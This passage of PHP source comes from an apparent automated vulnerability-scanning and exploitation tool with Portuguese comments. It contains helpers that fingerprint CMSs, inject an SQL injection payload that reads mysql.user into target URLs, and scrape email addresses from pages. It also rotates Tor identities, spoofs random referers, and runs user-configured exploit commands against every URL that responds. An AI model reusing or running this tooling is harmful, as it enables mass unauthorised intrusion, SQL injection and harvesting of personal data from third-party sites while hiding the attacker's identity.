  1246. echo "\n |FILE CONFIG: {$_SESSION['config']['file_exploit_conf']}";
  1247. echo "\n |USE COMMAND EX: --exploit-id '1,2,3,19'";
  1248. echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
  1249. print_r($resultadoURL);
  1250. __getOut("{$_SESSION['config']['line']}\n");
  1251. } else {
  1252. return is_array($resultadoURL) ? $resultadoURL : NULL;
  1253. }
  1254. }
  1255.  
  1256. ################################################################################
  1257. #INSERT VALUES COMMANDS FILE exploits.conf######################################
  1258. ################################################################################
  1259.  
  1260. function __configExploitsADD($valor = NULL) {
  1261.  
  1262. if (!is_null($valor) && preg_match("(([a-zA-Z0-9-].*)(::.*)([a-zA-Z0-9-]))", $valor)) {
  1263. echo __bannerlogo();
  1264. echo $_SESSION["c11"];
  1265. echo "[*]__\n";
  1266. echo " |MENU EXPLOITS:";
  1267. echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
  1268. echo "\n |STATUS: ADDED VALUE WITH SUCCESS!";
  1269. echo "\n |VALUE: {$valor}";
  1270. echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
  1271. __saveValue($_SESSION['config']['file_exploit_conf'], __crypt($valor), 2);
  1272. print_r(__configExploitsList());
  1273. __getOut("{$_SESSION['config']['line']}\n");
  1274. } else {
  1275.  
  1276. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}INCORRECT FORMAT! / Format TYPE_EXPLOIT::EXPLOIT_COMMAND / ex: NMAP::nmap -sV _TARGET_\n");
  1277. }
  1278. }
  1279.  
  1280. ################################################################################
  1281. #CHECK CMS######################################################################
  1282. ################################################################################
  1283.  
  1284. function __SimpleCheckCMS($html) {
  1285.  
  1286. $cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="XOOPS"';
  1287. $cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Joomla!';
  1288. $cms['Wordpress CMS IDENTIFIED'] = '<meta name="generator" content="WordPress';
  1289. $cms['SMF CMS IDENTIFIED-1'] = '<a href="http://www.simplemachines.org/" title="Simple Machines Forum" target="_blank">Powered by SMF';
  1290. $cms['SMF CMS IDENTIFIED-2'] = '<a href="http://www.simplemachines.org/about/copyright.php" title="Free Forum Software" target="_blank">SMF';
  1291. $cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="vBulletin';
  1292. $cms['vBulletin CMS IDENTIFIED-2'] = 'Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a> Version';
  1293. $cms['vBulletin CMS IDENTIFIED-3'] = 'powered by vBulletin';
  1294. $cms['phpBB CMS IDENTIFIED'] = 'Powered by <a href="http://www.phpbb.com/">phpBB</a>';
  1295. $cms['MyBB CMS IDENTIFIED'] = 'Powered By <a href="http://www.mybboard.net" target="_blank">MyBB</a>';
  1296. $cms['Drupal CMS IDENTIFIED-1'] = 'name="Generator" content="Drupal';
  1297. $cms['Drupal CMS IDENTIFIED-2'] = 'Drupal.settings';
  1298. $cms['MODx CMS IDENTIFIED'] = '<a href="http://www.modx.com" target="_blank"> Powered by MODx</a>';
  1299. $cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="SilverStripe - http://silverstripe.org" />';
  1300. $cms['Textpattern CMS IDENTIFIED'] = 'Powered by <a href="http://www.textpattern.com" title="Textpattern">Textpattern</a>';
  1301. $cms['Adapt CMS IDENTIFIED'] = 'Powered by <a href="http://www.adaptcms.com">AdaptCMS';
  1302. $cms['ATutor CMS IDENTIFIED'] = '<a href="/about.php">About ATutor</a>';
  1303. $cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="b2evolution';
  1304. $cms['Moodle CMS IDENTIFIED-1'] = 'Powered by <a href="http://moodle.org" title="Moodle">Moodle</a>';
  1305. $cms['Moodle CMS IDENTIFIED-2 '] = '<meta name="key words" content="moodle, Course Management System " />';
  1306. $cms['Moodle CMS IDENTIFIED-3'] = '://moodle';
  1307. $cms['Moodle CMS IDENTIFIED-4'] = '://www.mood le';
  1308. $cms['ATutor CMS IDENTIFIED'] = '<META NAME="GENERATOR" CONTENT="PHP-Nuke';
  1309. $cms['PostNuke CMS IDENTIFIED'] = '<meta name="generator" content="PostNuke';
  1310. $cms['CloudFlare IDENTIFIED-1'] = '<a href="http://www.cloudflare.com/" target="_blank" style=';
  1311. $cms['CloudFlare IDENTIFIED-2'] = 'DDoS protection by CloudFlare</a>';
  1312.  
  1313. foreach ($cms as $campo => $valor) {
  1314.  
  1315. __plus();
  1316. if (strstr($html, $cms[$campo])) {
  1317. return(" {$campo} ");
  1318. }
  1319. }
  1320. return "0xUNIDENTIFIED";
  1321. }
  1322.  
  1323. ################################################################################
  1324. #REPLACE THE SECURITIES URL#####################################################
  1325. ################################################################################
  1326.  
  1327. function __replace($exploit, $url) {
  1328.  
  1329. $exploit_ = strstr($_SESSION['config']['replace'], '[INURL]') ?
  1330. $exploit :
  1331. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1332. $exploit = explode("[INURL]", $exploit_);
  1333. $exploit[0] = (isset($exploit[0]) && !is_null($exploit[0])) ?
  1334. $exploit[0] :
  1335. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1336. $exploit[1] = (isset($exploit[0]) && !is_null($exploit[1])) ?
  1337. $exploit[1] :
  1338. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1339. return str_replace($exploit[0], $exploit[1], $url);
  1340. }
  1341.  
  1342. ################################################################################
  1343. #REMOVE VALUE URL###############################################################
  1344. ################################################################################
  1345.  
  1346. function __remove($value, $url) {
  1347.  
  1348. return str_replace($value, NULL, $url);
  1349. }
  1350.  
  1351. ################################################################################
  1352. #VALID MENU OPTIONS#############################################################
  1353. ################################################################################
  1354.  
  1355. function __validateOptions($opArray, $validar, $op = NULL) {
  1356.  
  1357. if (empty($validar) || empty($opArray)) {
  1358. return FALSE;
  1359. }
  1360.  
  1361. $array = explode(',', $opArray);
  1362. if (is_null($op)) {
  1363. $busca = explode(',', $validar);
  1364. for ($i = 0; $i <= count($busca); $i++) {
  1365. if (in_array($busca[$i], $array)) {
  1366. return TRUE;
  1367. }
  1368. }
  1369. } else {
  1370. for ($i = 0; $i <= count($array); $i++) {
  1371. if (strstr($validar, $array[$i])) {
  1372. return TRUE;
  1373. }
  1374. }
  1375. }
  1376. return FALSE;
  1377. }
  1378.  
  1379. ################################################################################
  1380. #VALIDATE OPERATING SYSTEM AND COLOR SYSTEM#####################################
  1381. ################################################################################
  1382.  
  1383. function __OS() {
  1384.  
  1385. $sistema = strtoupper(PHP_OS);
  1386. if (substr($sistema, 0, 3) == "WIN") {
  1387. $i = 0;
  1388. system("cls");
  1389. $_SESSION["os"] = 1;
  1390. while ($i <= 17) {
  1391. $_SESSION["c{$i}"] = NULL;
  1392. $i++;
  1393. }
  1394. } else {
  1395. system("command clear");
  1396. //DEFINING COLORS
  1397. $_SESSION["c0"] = "\033[0m"; // END OF COLOR
  1398. $_SESSION["c1"] = "\033[1;37m"; // WHITE
  1399. $_SESSION["c2"] = "\033[1;33m"; // YELLOW
  1400. $_SESSION["c3"] = "\033[1;31m"; // RED LIGHT
  1401. $_SESSION["c4"] = "\033[32m"; // GREEN
  1402. $_SESSION["c5"] = "\033[1;32m"; // GREEN LIGHT
  1403. $_SESSION["c6"] = "\033[0;35m"; // PURPLE
  1404. $_SESSION["c7"] = "\033[1;30m"; // DARK GREY
  1405. $_SESSION["c8"] = "\033[0;34m"; // BLUE
  1406. $_SESSION["c9"] = "\033[0;37m"; // LIGHT GREY
  1407. $_SESSION["c10"] = "\033[0;33m"; // BROWN
  1408. $_SESSION["c11"] = "\033[1;35m"; // LIGHT PURPLE
  1409. $_SESSION["c12"] = "\033[0;31m"; // RED
  1410. $_SESSION["c13"] = "\033[1;36m"; // LIGHT CYAN
  1411. $_SESSION["c14"] = "\033[0;36m"; // CIANO
  1412. $_SESSION["c15"] = "\033[1;34m"; // LIGHT BLUE
  1413. $_SESSION["c16"] = "\033[02;31m"; // DARK RED
  1414. }
  1415. }
  1416.  
  1417. ################################################################################
  1418. #SAVE URL VULNERABLE COMMAND ECHO >> FILE######################################
  1419. ################################################################################
  1420.  
  1421. function __saveValue($arquivo, $valor, $op = NULL) {
  1422.  
  1423. $path = !not_isnull_empty($_SESSION['config']['save-as']) ? $_SESSION['config']['out_put_paste'] : NULL;
  1424. echo ($op == 1) ?
  1425. "\n{$_SESSION["c1"]}|_[ + ]{$_SESSION["c7"]} VALUE SAVED IN THE FILE::{$_SESSION["c9"]} {$arquivo}{$_SESSION["c0"]}" : NULL;
  1426. file_put_contents(($op == 2) ? $arquivo : $path . $arquivo, "{$valor}\n", FILE_APPEND);
  1427. }
  1428.  
  1429. ################################################################################
  1430. #CAPTURE ID KEY TO SEARCH LYCOS MAKE############################################
  1431. ################################################################################
  1432.  
  1433. function __getIdSearchLycos($html) {
  1434.  
  1435. $match = NULL;
  1436. preg_match_all("(val.*)", $html, $match);
  1437. return (str_replace(');', '', str_replace('val(', '', str_replace("'", '', $match[0][4]))));
  1438. }
  1439.  
  1440. ################################################################################
  1441. #RENEW IP NETWORK TOR###########################################################
  1442. ################################################################################
  1443.  
  1444. function __renewTOR() {
  1445.  
  1446. system("[ -z 'pidof tor' ] || pidof tor | xargs sudo kill -HUP;");
  1447. $request__ = __request_info('http://dynupdate.no-ip.com/ip.php', $_SESSION["config"]["proxy"]);
  1448. __plus();
  1449. echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ IP NETWORK TOR RENEWED ]::: {$_SESSION["c1"]}[ {$request__['corpo'] } ]\n{$_SESSION["c0"]}";
  1450. /* https://pt.wikipedia.org/wiki/Pidof
  1451. * pidof é um utilitário Linux que encontra o ID de um programa em execução.
  1452. * Note que o próprio nome é a junção dos termos pid, que significa identidade
  1453. * de um processo e of que significa de. Portanto pidof quer dizer identidade
  1454. * de processo de...
  1455. * O equivalente no Solaris é pgrep. pidof firefox-bin O commando acima retorna
  1456. * o pid do processo que está executando firefox-bin.
  1457. * Pode-se combinar o commando 'pidof' com o commando kill dessa forma:
  1458. * kill -9 $(pidof firefox-bin) pidof é simplesmente uma ligação simbólica
  1459. * para o programa killall5,que está localizado em /sbin.
  1460. */
  1461. }
  1462.  
  1463. ################################################################################
  1464. #This function will validate emails#############################################
  1465. ################################################################################
  1466.  
  1467. function __validateEmail($email) {
  1468.  
  1469. $conta = "^[a-zA-Z0-9\._-]+@";
  1470. $domino = "[a-zA-Z0-9\._-]+.";
  1471. $extensao = "([a-zA-Z]{2,4})$";
  1472.  
  1473. $pattern = $conta . $domino . $extensao;
  1474.  
  1475. return (ereg($pattern, $email)) ? TRUE : FALSE;
  1476. }
  1477.  
  1478. ################################################################################
  1479. #This function will validate URLS###############################################
  1480. ################################################################################
  1481.  
  1482. function __validateURL($url) {
  1483.  
  1484. if (preg_match("#\b(http[s]?://|ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si", $url)) {
  1485. return TRUE;
  1486. } else {
  1487. return FALSE;
  1488. }
  1489. }
  1490.  
  1491. ################################################################################
  1492. #This function will filter custom values########################################
  1493. ################################################################################
  1494.  
  1495. function __extractRegCustom($html, $url_) {
  1496.  
  1497. $matches = NULL;
  1498. __plus();
  1499. preg_match_all("#\b{$_SESSION['config']['regexp-filter']}#i", $html, $matches);
  1500.  
  1501. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1502. echo "{$_SESSION["c1"]} |_[ URL ] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1503.  
  1504. $matches_ = array_filter(array_unique(array_unique($matches[0])));
  1505. foreach ($matches_ as $valor) {
  1506.  
  1507. if (not_isnull_empty($valor)) {
  1508.  
  1509. echo "{$_SESSION["c1"]}__[ + ] {$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor}\n";
  1510. $_SESSION["config"]["resultado_valores"].="{$valor}\n";
  1511. __plus();
  1512. __saveValue($_SESSION["config"]["arquivo_output"], $valor);
  1513. $_SESSION['config']['cont_valores'] ++;
  1514. }
  1515. __plus();
  1516. }
  1517. __timeSec('delay', "\n");
  1518. }
  1519.  
  1520. ################################################################################
  1521. #This function will filter and mail each url####################################
  1522. ################################################################################
  1523.  
  1524. function __filterEmailif($resultados) {
  1525.  
  1526. if (is_array($resultados)) {
  1527. echo "{$_SESSION["c1"]}|_[ ! ][ INFO ]{$_SESSION["c16"]}[ FILTERING VALUE ]::{$_SESSION["c1"]}[ {$_SESSION["config"]['ifemail']} ]{$_SESSION["c0"]}\n";
  1528. foreach ($resultados as $value) {
  1529.  
  1530. $temp[] = (strstr($value, $_SESSION['config']['ifemail']) ? $value : NULL);
  1531. }
  1532.  
  1533. return array_unique(array_filter($temp));
  1534. }
  1535.  
  1536. RETURN FALSE;
  1537. }
  1538.  
  1539. ################################################################################
  1540. #This function extract emails###################################################
  1541. ################################################################################
  1542.  
  1543. function __extractEmail($html, $url_) {
  1544.  
  1545. $matches = NULL;
  1546. __plus();
  1547. preg_match_all('/([\w\d\.\-\_]+)@([\w\d\.\_\-]+)/mi', $html, $matches);
  1548. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1549. echo "{$_SESSION["c1"]}|_[ ! ][ INFO ][URL] :: {$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1550.  
  1551. $_matches = array_filter(array_unique(array_unique($matches[0])));
  1552. $matches_ = (not_isnull_empty($_SESSION['config']['ifemail']) ? __filterEmailif($_matches) : $_matches);
  1553.  
  1554. foreach ($matches_ as $valor) {
  1555.  
  1556. if (__validateEmail($valor)) {
  1557.  
  1558. echo "{$_SESSION["c1"]}|_[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor} "
  1559. . (filter_var($valor, FILTER_VALIDATE_EMAIL) ?
  1560. "{$_SESSION["c14"]}[ OK ]{$_SESSION["c0"]}" : "{$_SESSION["c16"]}[ NO ]{$_SESSION["c0"]}") . "\n";
  1561. (filter_var($valor, FILTER_VALIDATE_EMAIL) ? $_SESSION["config"]["resultado_valores"].="{$valor}\n" : NULL);
  1562. __plus();
  1563. (filter_var($valor, FILTER_VALIDATE_EMAIL) ? __saveValue($_SESSION["config"]["arquivo_output"], $valor) : NULL);
  1564.  
  1565. $_SESSION['config']['cont_valores'] ++;
  1566. }
  1567. __plus();
  1568. }
  1569. __timeSec('delay', "\n");
  1570. }
  1571.  
  1572. ################################################################################
  1573. #This function will filter urls each url########################################
  1574. ################################################################################
  1575.  
  1576. function __extractURLs($html, $url_) {
  1577.  
  1578. $matches = NULL;
  1579. __plus();
  1580. $reg_tag = 'href=\"|src=\"|value=\"';
  1581. $reg = "#\b({$reg_tag}http[s]?://|{$reg_tag}ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
  1582. preg_match_all($reg, $html, $matches);
  1583. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1584. echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1585. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1586. $matches_ = array_unique(array_filter($matches[0]));
  1587. $blacklist = $_SESSION["config"]['blacklist'];
  1588. $blacklist_ = (isset($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $blacklist) : $blacklist;
  1589.  
  1590. foreach ($matches_ as $valor) {
  1591.  
  1592. $valor = __filterURLTAG($valor);
  1593. if (__validateURL($valor) && !__validateOptions($blacklist_, $valor, 1)) {
  1594. echo "{$_SESSION["c1"]}__[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION["config"]['cont_url']}"
  1595. . " {$_SESSION["c9"]}]- {$valor}{$_SESSION["c0"]}\n";
  1596. $_SESSION["config"]["resultado_valores"].="{$valor}\n";
  1597. __plus();
  1598. __saveValue($_SESSION["config"]["arquivo_output"], $valor) . __plus();
  1599. $_SESSION["config"]["cont_url"] ++;
  1600. }
  1601. __plus();
  1602. }
  1603. __timeSec('delay', "\n");
  1604. }
  1605.  
  1606. ################################################################################
  1607. #This function removes the last regular expression ta###########################
  1608. ################################################################################
  1609.  
  1610. function __filterURLTAG($valor = NULL) {
  1611.  
  1612. return(!is_null($valor)) ? str_replace('"', '', str_replace('href="', '', str_replace('src="', '', str_replace('value="', '', $valor)))) : NULL;
  1613. }
  1614.  
  1615. ################################################################################
  1616. #Esta função irá formatar salvar urls concatenadas##############################
  1617. ################################################################################
  1618.  
  1619. function __checkURLs($resultado, $url_) {
  1620.  
  1621. __plus();
  1622. $code = !is_null($_SESSION["config"]["ifcode"]) ? $_SESSION["config"]["ifcode"] : 200;
  1623. $valor = ($resultado['server']['http_code'] == $code) ? "{$_SESSION["c4"]}" : NULL;
  1624.  
  1625. echo "\n{$_SESSION["c1"]} |_[ INFO ]{$_SESSION["c0"]}[{$_SESSION["c1"]} {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]\n";
  1626. echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}::{$_SESSION["c9"]}{$valor} {$url_} {$_SESSION["c0"]}\n";
  1627. echo "{$_SESSION["c1"]} |_[ INFO ][STATUS]::{$valor} {$resultado['server']['http_code']} {$_SESSION["c0"]}\n";
  1628.  
  1629. __timeSec('delay');
  1630. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}";
  1631. __plus();
  1632.  
  1633. $target_ = array('url_clean' => $url_, 'url_xpl' => $url_);
  1634.  
  1635. if ($resultado == $code) {
  1636.  
  1637. $_SESSION['config']['resultado_valores'].= "{$url_}\n";
  1638. __saveValue($_SESSION["config"]["arquivo_output"], $url_) . __plus();
  1639. __plus();
  1640.  
  1641. (not_isnull_empty($_SESSION['config']['sub-file']) &&
  1642. is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
  1643. __plus();
  1644.  
  1645. (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
  1646. __plus();
  1647.  
  1648. (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
  1649. __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
  1650. __plus();
  1651. }
  1652.  
  1653. (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
  1654. __plus();
  1655.  
  1656. (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
  1657. __plus();
  1658.  
  1659. $_SESSION['config']['cont_valores'] ++;
  1660.  
  1661. __plus();
  1662. }
  1663.  
  1664. ################################################################################
  1665. #This function will send the contents of the output buffer (if any)#############
  1666. ################################################################################
  1667.  
  1668. function __plus() {
  1669.  
  1670. ob_flush();
  1671. flush();
  1672. }
  1673.  
  1674. ################################################################################
  1675. #FORMATTING POST################################################################
  1676. ################################################################################
  1677.  
  1678. function __convertUrlQuery($query) {
  1679.  
  1680. $queryParts = explode('&', $query);
  1681. $params = array();
  1682. $match = array();
  1683. foreach ($queryParts as $param) {
  1684. $item = explode('=', $param);
  1685. preg_match_all("([a-zA-Z0-9]=(.*))", $param, $match);
  1686. $params[$item[0]] = ($match[1][0]);
  1687. }
  1688.  
  1689. return $params;
  1690. }
  1691.  
  1692. ################################################################################
  1693. #OPEN FILE BASE FOR VALIDATION##################################################
  1694. ################################################################################
  1695.  
  1696. function __openFile($arquivo, $op = NULL) {
  1697.  
  1698. if (isset($arquivo) && !empty($arquivo)) {
  1699. $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($arquivo))));
  1700.  
  1701. if (is_array($resultadoURL)) {
  1702.  
  1703. return ($op == 1 ? $resultadoURL : __process($resultadoURL));
  1704. }
  1705. }
  1706. }
  1707.  
  1708. ################################################################################
  1709. #CATCH INFORMATION IP###########################################################
  1710. ################################################################################
  1711.  
  1712. function __infoIP($ip, $op = 0) {
  1713.  
  1714. /*
  1715. [longitude] => 4.9
  1716. [latitude] => 52.3667
  1717. [asn] => AS196752
  1718. [offset] => 2
  1719. [ip] => 46.19.37.0
  1720. [area_code] => 0
  1721. [continent_code] => EU
  1722. [dma_code] => 0
  1723. [timezone] => Europe/Amsterdam
  1724. [country_code] => NL
  1725. [isp] => Tilaa B.V.
  1726. [country] => Netherlands
  1727. [country_code3] => NLD
  1728. */
  1729.  
  1730. preg_match_all('#\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})#si', $ip, $ip);
  1731. if (filter_var($ip[0][0], FILTER_VALIDATE_IP)) {
  1732. if ($op == 0) {
  1733. $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
  1734. __plus();
  1735. return json_decode($request__['corpo'], TRUE);
  1736. } else {
  1737. $_SESSION['config']['verifica_info'] = NULL;
  1738. $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
  1739. $return = json_decode($request__['corpo'], TRUE);
  1740. __plus();
  1741. return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}";
  1742. }
  1743. }
  1744. }
  1745.  
  1746. ################################################################################
  1747. #CAPTURE URL POSITION IN BROWSER ALEXA / RELEVANCE OF SUCH URL##################
  1748. ################################################################################
  1749.  
  1750. function __positionAlexa($url) {
  1751.  
  1752. $xmlSimple = simplexml_load_file("http://data.alexa.com/data?cli=10&dat=snbamz&url={$url}");
  1753. $resultRank = $xmlSimple->SD[1];
  1754. __plus();
  1755. if ($resultRank) {
  1756. $retornoRank = $resultRank->REACH->attributes()->RANK;
  1757. } else {
  1758. $retornoRank = 0;
  1759. }
  1760. return $retornoRank . __plus();
  1761. }
  1762.  
  1763. ################################################################################
  1764. #GENERATE URL REFERENCE random##################################################
  1765. ################################################################################
  1766.  
  1767. function __setURLReferenceRandom() {
  1768.  
  1769. $dominio = array('Adzuna', 'Bixee', 'CareerBuilder', 'Craigslist', 'Dice', 'Eluta.ca', 'Hotjobs', 'JobStreet', 'Incruit', 'Indeed', 'Glassdoor', 'LinkUp', 'Monster', 'Naukri',
  1770. 'Yahoo', 'Legal', 'GoogleScholar', 'Lexis', 'Manupatra', 'Quicklaw', 'WestLaw', 'Medical', 'Bing Health', 'Bioinformatic', 'CiteAb', 'EB-eye', 'Entrez', 'mtv', 'ubuntu',
  1771. 'GenieKnows', 'GoPubMed', 'Healia', 'Healthline', 'Nextbio', 'PubGene', 'Quertle', 'Searchmedica', 'WebMD', 'News', 'BingNews', 'Daylife', 'GoogleNews', 'aol', 'microsoft',
  1772. 'MagPortal', 'Newslookup', 'Nexis', 'Topix', 'Trapit', 'YahooNews', 'People', 'Comfibook', 'Ex.plode', 'InfoSpace', 'PeekYou', 'Spock', 'Spokeo', 'WorldwideHelpers', 'iPhone',
  1773. 'Zabasearch', 'ZoomInfo', 'Fizber', 'HotPads', 'Realtor', 'Redfin', 'Rightmove', 'Trulia', 'Zillow', 'Zoopla', 'StuRents', 'globo', 'sbt', 'band', 'cnn', 'blog.inurl.com.br'
  1774. );
  1775.  
  1776. $gTLD = array('aero', 'arpa', 'biz', 'com', 'coop', 'edu', 'gov', 'info', 'int', 'mil', 'museum', 'name', 'net', 'org', 'pro', 'tel');
  1777.  
  1778. $arquivo = array('admin', 'index', 'wp-admin', 'info', 'shop', 'file', 'out', 'open', 'news', 'add', 'profile', 'search', 'open', 'photo', 'insert', 'view');
  1779. $ext = array('exe', 'php', 'asp', 'aspx', 'jsf', 'html', 'htm', 'lua', 'log', 'cgi', 'sh', 'css', 'py', 'sql', 'xml', 'rss');
  1780.  
  1781. $pasta = array('App_Files', 'Assets', 'CFFileServlet', 'CFIDE', 'Communication', 'Computers', 'CoreAdminHome', 'CoreHome', 'Crawler', 'Creator',
  1782. 'DECOM', 'Dashboard', 'Drives', 'Dynamic', 'FCKeditor', 'Feedback', 'Files', 'Flash', 'Forms', 'Help', 'ICEcore', 'IO', 'Image', 'JPG', 'getold',
  1783. 'JSP', 'KFSI', 'Laguna', 'Login', 'Motors', 'MultiSites', 'NR', 'OCodger', 'RSS', 'Safety', 'Smarty', 'Software', 'Static', 'Stress', 'getfull',
  1784. 'Sugarcrm', 'Travel', 'UPLOAD', 'Urussanga', 'UserFiles', '__tpl', '_fckeditor', '_info', '_machine', '_plugins', '_sample', '_samples', 'postmost',
  1785. '_source', '_testcases', 'aaa', 'abelardoluz', 'aberlardoluz', 'aborto', 'about', 'aboutus', 'abuse', 'abusers', 'ac_drives', 'acabamentos', 'mail',
  1786. 'academias', 'acao', 'acartpro', 'acatalog', 'acc', 'acc_auto_del', 'acc_beep_ken', 'acc_beep_time', 'acc_ch_mail', 'acc_fc_prsc', 'accounts', 'validar',
  1787. 'acc_html_mark', 'acc_html_rand', 'acc_lan_page', 'acc_pic_html', 'acc_profol', 'acc_soft_link', 'acc_ssd_page', 'acc_syun_ei', 'german', 'intranet', 'old',
  1788. 'acc_time_go', 'acc_wbcreator', 'accept', 'accepted', 'acceso', 'access', 'accessibility', 'accessories', 'acciones', 'acclg', 'account', 'paste', 'paste22',
  1789. 'acessorios', 'acontece', 'acougueiro', 'acoustic', 'act', 'action', 'activate', 'active', 'activeden', 'activism', 'actualit', 'actuators', 'ad', 'informatica',
  1790. 'ad_division', 'ad_rate', 'adapter', 'adapters', 'adaptive', 'adaptivei', 'adatmentes', 'adbanner', 'adblock', 'adboard', 'adclick', 'add-ons', 'add', 'delete',
  1791. 'added', 'addon', 'address', 'adduser', 'adfree', 'adhoc', 'adinfo', 'adios_papa', 'adlink', 'adlinks', 'acc_folder_vw', 'acc_syun_su',
  1792. );
  1793.  
  1794. $locais = array('ac', 'ad', 'ae', 'af', 'ag', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'as', 'at', 'au', 'aw', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn',
  1795. 'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'bo', 'br',
  1796. 'ec', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'bs', 'bt',
  1797. 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'bv',
  1798. 'kh', 'ki', 'km', 'kn', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mk', 'ml',
  1799. 'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'nb', 'nc', 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
  1800. 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si',
  1801. 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'ss', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tr', 'tt', 'tv',
  1802. 'tw', 'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'yu', 'za', 'zm', 'zw', 'ai',
  1803. );
